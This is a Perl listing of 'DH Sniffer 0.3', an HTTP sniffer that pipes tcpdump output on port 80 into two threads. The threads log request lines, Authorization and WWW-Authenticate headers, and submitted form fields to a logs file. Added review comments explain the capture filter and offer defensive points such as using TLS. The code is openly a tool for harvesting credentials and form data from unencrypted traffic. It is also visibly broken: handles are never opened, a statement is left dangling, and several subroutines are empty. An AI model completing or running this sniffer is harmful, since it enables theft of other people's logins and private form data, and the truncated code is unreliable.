El código:
#!usr/bin/perl
# NOTE(review): the interpreter path above has no leading slash, so it is
# resolved relative to the current directory when used as a shebang.
#DH Sniffer 0.3
#(C) Doddy Hackman 2014
#Credits :
#Based on :
#http://stackoverflow.com/questions/4777042/can-i-use-tcpdump-to-get-http-requests-response-header-and-response-body
#http://www.perlmonks.org/?node_id=656590
#http://stein.cshl.org/~lstein/talks/WWW6/sniffer/
#http://perlenespanol.com/foro/post36051.html
#Thanks to : Lincoln D. Stein , paulz and Explorer
#
# Overview: the script starts two threads, sniffer_get and sniffer_post, and
# waits for both. Each thread reads lines from a bareword filehandle (GET or
# POST) and writes request lines, authentication headers and form parameters
# it recognises to "logs" through savefile().
#
# NOTE(review): this listing is incomplete as published. Nothing visible
# assigns $control or opens GET, POST or SAVE; in sniffer_post only the tail
# of a call survives (a syntax error as shown); and savefile, head and
# copyright have lost their bodies. The comments below describe only what is
# visible.
#
# Defensive reading: the only capture filter visible here is limited to
# 'tcp port 80', and the parsing relies on readable request text, so what it
# can log is unencrypted HTTP: request lines, Authorization /
# WWW-Authenticate headers and form fields. Serving those endpoints over TLS
# removes that data from view. On the capturing host the artefacts are a
# tcpdump child process (which needs packet-capture privileges) and the
# "logs" output (presumably a file name -- savefile's body is not shown).

use CGI;
use threads;
use URI::Escape;

# Unbuffered STDOUT.
$| = 1;

head();

# $control is never assigned in the visible listing, so this comparison is
# always true here and the /g/ and /p/ checks further down never match.
# NOTE(review): presumably it was filled from command-line options in the
# complete script -- confirm against the original.
if ( $control eq "" ) {
    copyright();
}

# One thread per parser; both are joined, so the main thread blocks until
# both subs return.
my $hilo_get = threads->new( \&sniffer_get );
my $hilo_post = threads->new( \&sniffer_post );

$hilo_get->join;
$hilo_post->join;

# sniffer_get: when $control contains "g", read lines from the GET handle,
# rebuild text from hex-dump lines into $contenido, and log every
# request-line / auth-header match found in that buffer.
# NOTE(review): GET is never opened in the visible listing; presumably it was
# a pipe from a tcpdump hex dump -- confirm against the original.
sub sniffer_get {
    if ( $control =~ /g/ ) {
        while (<GET>) {

            # A line that starts with a non-space character is treated as a
            # packet header line (the indented lines being the dump body).
            if (/^\S/) {

                # Scan everything accumulated so far and log each match,
                # URL-decoded, prefixed with the addresses captured from the
                # previous header line. $contenido is never cleared in the
                # visible code.
                while ( $contenido =~ /(GET|POST|WWW-Authenticate|Authorization).+/g ) {
                    savefile( "logs", "\n[+] $ip = $name " . uri_unescape($&) );
                }

                # Source and destination IPv4 addresses from the header line
                # ("IP a.b.c.d... > e.f.g.h"). Despite its name, $name holds
                # the destination address.
                ( $ip, $name ) = /IP (\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/;
            }

            # The steps below run on every line, header lines included
            # (the block above does not skip to the next line).
            s/\s+//g;                          # drop all whitespace
            s/0x[abcdef\d]+://i;               # drop the first "0x<hex>:" prefix
            s/([0-9a-f]{2})/chr(hex($1))/eg;   # each lowercase hex pair -> its character
            tr/\x1F-\x7E\r\n//cd;              # delete everything except \x1F-\x7E, CR and LF
            $contenido .= $_;
        }
    }
}

# sniffer_post: when $control contains "p", read lines from the POST handle
# and log the name/value pairs that CGI.pm parses out of them.
sub sniffer_post {
    if ( $control =~ /p/ ) {

        # NOTE(review): the start of this statement is missing from the
        # listing; what remains is a string literal followed by ");", which
        # does not compile. Presumably it was the open() of POST as a pipe
        # (the string ends in "|") -- confirm against the original.
        # The command in the string: tcpdump -A prints packet payloads as
        # ASCII, -s 0 captures whole packets, and the filter keeps TCP port 80
        # packets whose payload is non-empty (IP total length minus IP header
        # length minus TCP header length != 0).
        "tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' |" );
        while (<POST>) {

            # Only lines that start with a non-space character are parsed.
            if (/^\S/) {
                my $code = $_;

                # The raw line is handed to CGI->new as its initializer, so it
                # is parsed as a query string.
                $buscando = CGI->new($code);
                my @params = $buscando->param;
                foreach $par (@params) {

                    # Parameter names containing a dot are skipped.
                    if ( $par =~ /\./ ) {
                        next;
                    }
                    else {
                        my $dataf = $buscando->param($par);
                        savefile( "logs", "\n[+] $par " . " : " . $dataf );
                    }
                }
            }
        }
    }
}

# savefile: called above as savefile( "logs", $text ).
# NOTE(review): only the close of SAVE survives in this listing; the code that
# opened the handle and wrote the text is missing.
sub savefile {
    close SAVE;
}

# head: body is empty in this listing.
sub head {
}

# copyright: body is empty in this listing.
sub copyright {
}

# The End ?
Eso es todo.